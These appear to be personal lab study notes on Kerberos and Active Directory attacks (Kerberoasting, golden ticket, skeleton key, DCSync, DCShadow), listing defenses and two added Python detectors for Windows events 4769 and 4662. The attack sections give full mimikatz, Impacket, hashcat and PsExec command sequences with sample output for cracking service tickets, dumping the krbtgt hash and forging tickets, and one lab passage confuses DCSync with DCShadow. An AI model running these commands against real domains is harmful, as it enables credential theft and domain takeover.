Kerberos

General

  • 3 Heads of Kerberos:

    • Client > TrustedServer/DC > Server

Ticket Flow

  Ticket Flow                         | Example (driver's license analogy)
  ------------------------------------|------------------------------------
  Request TGT >                       | Apply for Driver's License >
  < TGT + SessionKey                  | < Granted with Hologram
  TGT + Request to TGS >              | Request to go to ABC Store >
  < ServiceTicket                     | < Approved w/ ABC Hash/Ticket
  Auth to Service w/ ServiceTicket >  | Going to ABC Store >

3 Long-Term Keys

  1. Client (me)

  2. Target/Service key

  3. KDC (from krbtgt acct)

Group Policy for TGT Encryption

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • > "Network security: Configure encryption types allowed for Kerberos" (this is where RC4 gets disabled and AES left on)

Attack Flow

  1. Find AD Accts with SPN (map between service and svc-acct)

  2. Request RC4 service tickets from DC

  3. Extract Service Tickets to file

  4. Offline Brute Force

Kerberoasting Targets

  1. MSSQL

  2. AGPMServer (for GPO)

  3. FIMService (Forefront Identity)

  4. STS (Security Token Service VMWare)

Defenses:

  • Disable RC4 with GPO

  • Use AES instead

  • Managed Service Accounts (no pw to change)

  • Protected Users group - password/Kerberos keys aren't cached in LSASS memory

  • PAC validation

  • Credential Guard - hashes and Kerberos keys can't be stolen from LSASS

  • Service accounts like "sqlsvc" should not be Domain Admins
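The defenses above are preventive; the matching detection lives in the DC's Security log, where every service-ticket request is event 4769. The following added example (not from the page) scores constructed 4769 records two ways: any ticket for a user-backed SPN still issued with RC4 (etype 0x17/0x18, which should not happen once the GPO above is in place), and one account requesting tickets for many distinct SPNs in a short window, which is what step 2 of the attack flow looks like from the DC side regardless of etype. Field names follow the 4769 XML schema; the sample events, timestamps and service names are constructed.

```python
"""Kerberoasting detection over Windows Security event 4769 (TGS request) records.

Added example, not from the page: the event dicts below are constructed to
mimic the 4769 fields a SIEM exposes (TargetUserName is the requesting account).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos etypes as they appear in 4769's TicketEncryptionType field.
RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC, RC4-HMAC-EXP: crackable offline, what the attack asks for
AES_ETYPES = {"0x11", "0x12"}   # AES128/AES256-CTS-HMAC-SHA1-96: what the GPO should enforce

T0 = datetime(2024, 1, 15, 9, 0, 0)  # constructed timestamp base

# Constructed sample: 'bob' pulls RC4 tickets for three user-SPN services in under a
# minute (Kerberoast pattern); 'alice' makes ordinary AES requests.
SAMPLE_4769 = [
    {"TimeCreated": T0,                         "TargetUserName": "bob@MYDOM",   "ServiceName": "svcsqlserver", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20"},
    {"TimeCreated": T0 + timedelta(seconds=20), "TargetUserName": "bob@MYDOM",   "ServiceName": "agpmsvc",      "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20"},
    {"TimeCreated": T0 + timedelta(seconds=45), "TargetUserName": "bob@MYDOM",   "ServiceName": "fimsvc",       "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20"},
    {"TimeCreated": T0 + timedelta(minutes=1),  "TargetUserName": "bob@MYDOM",   "ServiceName": "DC01$",        "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.20"},
    {"TimeCreated": T0 + timedelta(minutes=30), "TargetUserName": "alice@MYDOM", "ServiceName": "svcsqlserver", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.31"},
    {"TimeCreated": T0 + timedelta(minutes=31), "TargetUserName": "alice@MYDOM", "ServiceName": "krbtgt",       "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.31"},
]


def is_user_spn(service_name):
    """True for services backed by a user account (the Kerberoast targets).

    Computer accounts ($) and krbtgt have long random keys and are noise here."""
    name = service_name.split("@")[0].lower()
    return not name.endswith("$") and name != "krbtgt"


def rc4_service_ticket_requests(events):
    """Every TGS request for a user-SPN service that was issued with RC4.

    After RC4 is disabled by GPO this list should be empty; any hit is either a
    legacy client to fix or a ticket request worth investigating."""
    return [e for e in events
            if e["TicketEncryptionType"].lower() in RC4_ETYPES and is_user_spn(e["ServiceName"])]


def burst_requesters(events, window=timedelta(minutes=5), threshold=3):
    """Accounts that requested tickets for >= threshold distinct user-SPN services
    inside one sliding window; returns {account: [services]}.

    Tools that request a ticket for every SPN produce this burst whatever the etype."""
    by_client = defaultdict(list)
    for e in events:
        if is_user_spn(e["ServiceName"]):
            by_client[e["TargetUserName"]].append(
                (e["TimeCreated"], e["ServiceName"].split("@")[0].lower()))
    findings = {}
    for client, reqs in by_client.items():
        reqs.sort()
        for i, (t_start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - t_start <= window}
            if len(spns) >= threshold:
                findings[client] = sorted(spns)
                break
    return findings


if __name__ == "__main__":
    for e in rc4_service_ticket_requests(SAMPLE_4769):
        print(f"RC4 service ticket: {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for client, spns in burst_requesters(SAMPLE_4769).items():
        print(f"Burst of SPN requests: {client} -> {spns}")
```

The burst rule is the one that survives the RC4 GPO, since AES tickets can still be requested in bulk; tune `window` and `threshold` against what normal clients in the domain do, and treat `IpAddress` as the pivot for the follow-up.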

Kerberoasting

Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPNs:
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain/bob -dc-ip $IP > spns.output
Found 'svcsqlserver' w/ RC4 (weak encryption; the ticket can be cracked offline)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: grab the tickets with Mimikatz and export them to .kirbi files
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the ticket offline:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect with the cracked creds:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom\svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!
  • Other Method:

    • Powerview > Invoke-Kerberoast

Golden Ticket

  • Impacket:

    • secretsdump.py

    • wmiexec.py

    • lookupsid.py

    • ticketer.py

Get the nthash

> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          ^ 4th field = nthash (thenthashxyz1111)

Get the FQDN

> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom

Get the Domain SID

> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666

Create a golden ticket!

> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Abuse

  • The golden ticket - DO NOT EXECUTE !!!

  • After exporting the Administrator.ccache ticket file..

  • You can use any tool from the impacket suite like wmiexec or psexec with -k -no-pass

> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k -no-pass

Mimikatz

  • Create a Golden Ticket with Mimikatz

mimikatz > kerberos::golden /krbtgt:e19xyz... /admin:root /domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt):
mimikatz > kerberos::ptt golden.ticket.bin

Skeleton Key (mimikatz)

  • Sets up a special key for login as pw: mimikatz

  • Patches the LSA Process in Memory

  • Requires Admin rights and Debug Privs

  • Reboot to 'clear' the setup

mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!

DCSync (mimikatz)

  • Copies the "ntds.dit"

m> lsadump::dcsync /user:administrator
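DCSync never touches ntds.dit on disk; it asks a DC for replication data over DRSUAPI, exactly as a partner DC would. That shows up on the DC as Security event 4662 ("an operation was performed on an object") with the replication extended-right GUIDs in the Properties field, so the detection is "replication rights used by a principal that is not a DC". The following added example (not from the page) implements that check over constructed 4662 records; the DC account list and the sample events are constructed, the three extended-right GUIDs are the well-known AD ones.

```python
"""DCSync detection over Windows Security event 4662 (operation on an AD object).

Added example, not from the page. DCSync requests replication data, which is a
'Control Access' operation carrying the replication extended-right GUIDs in
4662's Properties field. The sample events and the DC list are constructed.
"""

# Extended rights a replication partner needs; a non-DC principal using them
# is the DCSync signature.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed: the domain's real DC computer accounts (build this from AD in practice).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed 4662 records; Properties mimics the multi-line GUID list of the real event.
SAMPLE_4662 = [
    {   # normal DC-to-DC replication
        "SubjectUserName": "DC02$", "SubjectDomainName": "MYDOM", "ObjectServer": "DS",
        "AccessMask": "0x100",
        "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # a service account pulling replication data: DCSync
        "SubjectUserName": "svcsqlserver", "SubjectDomainName": "MYDOM", "ObjectServer": "DS",
        "AccessMask": "0x100",
        "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # unrelated property read by a user, no replication rights involved
        "SubjectUserName": "bob", "SubjectDomainName": "MYDOM", "ObjectServer": "DS",
        "AccessMask": "0x10",
        "Properties": "Read Property\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}",
    },
]


def replication_rights_used(properties):
    """Names of the replication extended rights whose GUID appears in a 4662 Properties field."""
    props = properties.lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def dcsync_candidates(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """4662 events where a principal that is not a known DC used replication rights."""
    dc_set = {dc.upper() for dc in known_dcs}
    findings = []
    for e in events:
        if e.get("ObjectServer") != "DS":      # only directory-service object audits
            continue
        rights = replication_rights_used(e["Properties"])
        if not rights:
            continue
        subject = e["SubjectUserName"]
        if subject.upper() in dc_set:
            continue                            # expected replication between DCs
        findings.append({"user": f"{e['SubjectDomainName']}\\{subject}", "rights": rights})
    return findings


if __name__ == "__main__":
    for f in dcsync_candidates(SAMPLE_4662):
        print(f"Possible DCSync by {f['user']}: {', '.join(f['rights'])}")
```

4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain object has a SACL covering Control Access, so check that the event exists at all before relying on this rule; it also does not cover DCShadow, which registers a rogue DC rather than pulling from a real one.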

DCShadow

  • Similar to DCSync

  • Register myself as a DC

  • Uses replication, so almost invisible Logging

Mimikatz GT Lab

-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!

Last updated 2 years ago


REF:

NTDS